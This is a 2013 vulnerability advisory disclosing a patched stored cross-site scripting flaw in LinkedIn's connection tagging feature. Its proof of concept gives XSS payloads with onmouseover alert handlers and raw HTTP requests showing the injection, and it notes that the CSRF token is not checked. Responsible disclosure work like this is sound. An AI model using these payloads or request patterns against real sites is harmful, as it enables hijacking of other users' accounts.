LinkedIn Cross Site Scripting

`=============================================  
INTERNET SECURITY AUDITORS ALERT 2013-005  
- Original release date: 3rd March 2013  
- Last revised: 10th March 2013  
- Discovered by: Eduardo Garcia Melia  
- Severity: 5.2/10 (CVSS Base Scored)  
=============================================  
  
I. VULNERABILITY  
-------------------------  
LinkedIn social network is affected by Persistent Cross-Site Scripting  
vulnerability.   
  
II. BACKGROUND  
-------------------------  
LinkedIn is a social networking service and website operates the world's  
largest professional  
  
network on the Internet with more than 187 million members in over 200  
countries and territories.  
  
More Information: http://press.linkedin.com/about  
  
III. DESCRIPTION  
-------------------------  
LinkedIn social network is affected by Persistent Cross-Site Scripting  
vulnerability. The  
  
persistent (or stored) XSS vulnerability is a more devastating variant  
of a cross-site scripting  
  
flaw: it occurs when the data provided by the attacker is saved by the  
server, and then  
  
permanently displayed on "normal" pages returned to other users in the  
course of regular  
  
browsing, without proper HTML escaping. The affected resource is  
  
http://www.linkedin.com/people/connections when you create new tags.  
  
IV. PROOF OF CONCEPT  
-------------------------  
=========================  
First Option  
=========================  
You can go to LinkedIn Contacts -> Connections -> Manage. After, on the  
"Add New Tag" field, you  
  
can put these tags, for example:  
  
+ <IFRAME SRC=# onmouseover="alert('XSS')">  
+ <IMG SRC=# onmouseover="alert('XSS')">  
+ <IMG onmouseover="alert('XSS')">  
  
Finally, you should pulse "Add New Tag" button, and then show you the  
injection.  
  
=========================  
Second Option  
=========================  
You can go to LinkedIn Contacts -> Connections -> All Connections and  
then select one contact.  
  
After, on the right panel, you have a "Tags:" label, and you should  
pulse "Edit tags". Then you  
  
can put this tags, for example:  
  
+ <IFRAME SRC=# onmouseover="alert('XSS')">  
+ <IMG onmouseover="alert('XSS')">  
  
Finally, you should pulse "+" button, and then show you the injection.  
  
=========================  
REQUESTS  
=========================  
First, create <IFRAME SRC=# onmouseover="alert('XSS')"> Tag:  
  
REQUEST 1:  
  
POST /people/create-tag?csrfToken=TOKEN_CSRF HTTP/1.1  
Host: www.linkedin.com  
Origin: http://www.linkedin.com  
X-Requested-With: XMLHttpRequest  
X-IsAJAXForm: 1  
Cookie: XXXX  
  
  
&tagContext=undefined&tagName=%3CIFRAME%20SRC%3D%23%20onmouseover%3D%22alert('XSS')%22%3E  
  
RESPONSE 1:  
  
HTTP/1.1 200 OK  
Server: Apache-Coyote/1.1  
Content-Type: application/json;charset=UTF-8  
Content-Language: en-US  
Date: Sun, 03 Mar 2013 16:49:14 GMT  
X-FS-TXN-ID: 2b654458ea50  
X-FS-UUID: e0463ca154f7e712703c4a69cb2a0000  
X-LI-UUID: 4EY8oVT35xJwPEppyyoAAA==  
Age: 1  
X-Content-Type-Options: nosniff  
X-XSS-Protection: 0  
  
{"content":"113275897","status":"ok"}  
  
Second, make request for show you the tags name's:  
  
REQUEST 2:  
POST /people/fetch-tags?csrfToken=ajax%3A7023500174643473361 HTTP/1.1  
Host: www.linkedin.com  
Origin: http://www.linkedin.com  
X-Requested-With: XMLHttpRequest  
User-Agent: MSIE 9.0  
X-IsAJAXForm: 1  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept: */*  
Referer: http://www.linkedin.com/people/connections  
Cookie: XXX  
  
&tagContext=conn_detail_panel&memIds=M-220814631  
  
Or without the csrfToken, because not verify that the csrfToken value  
matches with cookie session  
  
token.  
  
RESPONSE:  
  
HTTP/1.1 200 OK  
Server: Apache-Coyote/1.1  
Content-Type: application/json;charset=UTF-8  
Date: Sun, 03 Mar 2013 16:50:37 GMT  
X-FS-TXN-ID: 2b8fc977b850  
X-FS-UUID: a0d6d9c867f7e712d0ff6b10ed2a0000  
X-LI-UUID: oNbZyGf35xLQ/2sQ7SoAAA==  
Age: 0  
X-Content-Type-Options: nosniff  
X-XSS-Protection: 0  
  
  
{"content":"[\"{\\\"id\\\":\\\"104055107\\\",\\\"name\\\":\\\"<IFRAME  
SRC=# onmouseover=  
  
\\\\\\\"alert('XSS')\\\\\\\">\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",\"{\\\"id\\\":\\  
  
\"104044777\\\",\\\"name\\\":\\\"classmates\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",\"{\\\"id  
  
\\\":\\\"104044787\\\",\\\"name\\\":\\\"colleagues\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",  
  
\"{\\\"id\\\":\\\"104044767\\\",\\\"name\\\":\\\"friends\\\",\\\"bucket\\\":\\\"tagsAllHave\\  
  
\"}\",\"{\\\"id\\\":\\\"104044797\\\",\\\"name\\\":\\\"group  
members\\\",\\\"bucket\\\":\\  
  
\"tagsNoneHave\\\"}\",\"{\\\"id\\\":\\\"104044807\\\",\\\"name\\\":\\\"partners\\\",\\\"bucket\\  
  
\":\\\"tagsNoneHave\\\"}\"]","status":"ok"}  
  
V. BUSINESS IMPACT  
------------------------  
If a malicious user will find a way to exploit this vulnerability could  
make other users are  
  
perform actions that he wanted in the application, since add them to  
your network, to erase the  
  
profile, because the csrf token is useless, since based on the user's  
session.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
The vulnerability affects the LinkedIn network:  
http://www.linkedin.com  
https://touch.www.linkedin.com  
  
VII. SOLUTION  
-------------------------  
Linkedin applied a new contact management system.  
  
VIII. REFERENCES  
-------------------------  
http://www.linkedin.com  
http://www.isecauditors.com  
http://en.wikipedia.org/wiki/Cross-site_scripting#Persistent  
  
IX. CREDITS  
-------------------------  
These vulnerabilities have been discovered by  
Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
March 03, 2013: Initial release  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
March 03, 2013: Vulnerability acquired by Internet Security Auditors  
(www.isecauditors.com)  
March 10, 2013: Send to Sec Team.  
July 4, 2013: Initial vendor notification sent  
July 9, 2013: Vendor implemented a fix  
November 11, 2013: Disclosure  
  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is" with  
no warranties or  
  
guarantees of fitness of use or otherwise. Internet Security Auditors  
accepts no responsibility  
  
for any damage caused by the use or misuse of this information.  
  
XIII. ABOUT  
-------------------------  
Internet Security Auditors is a Spain based leader in web application  
testing, network security,  
  
penetration testing, security compliance implementation and assessing.  
Our clients include some  
  
of the largest companies in areas such as finance, telecommunications,  
insurance, ITC, etc. We  
  
are vendor independent provider with a deep expertise since 2001. Our  
efforts in R&D include  
  
vulnerability research, open security project collaboration and  
whitepapers, presentations and  
  
security events participation and promotion. For further information  
regarding our security  
  
services, contact us.  
  
XIV. FOLLOW US  
-------------------------  
You can follow Internet Security Auditors, news and security advisories at:  
https://www.facebook.com/ISecAuditors  
https://twitter.com/ISecAuditors  
http://www.linkedin.com/company/internet-security-auditors  
http://www.youtube.com/user/ISecAuditors  
`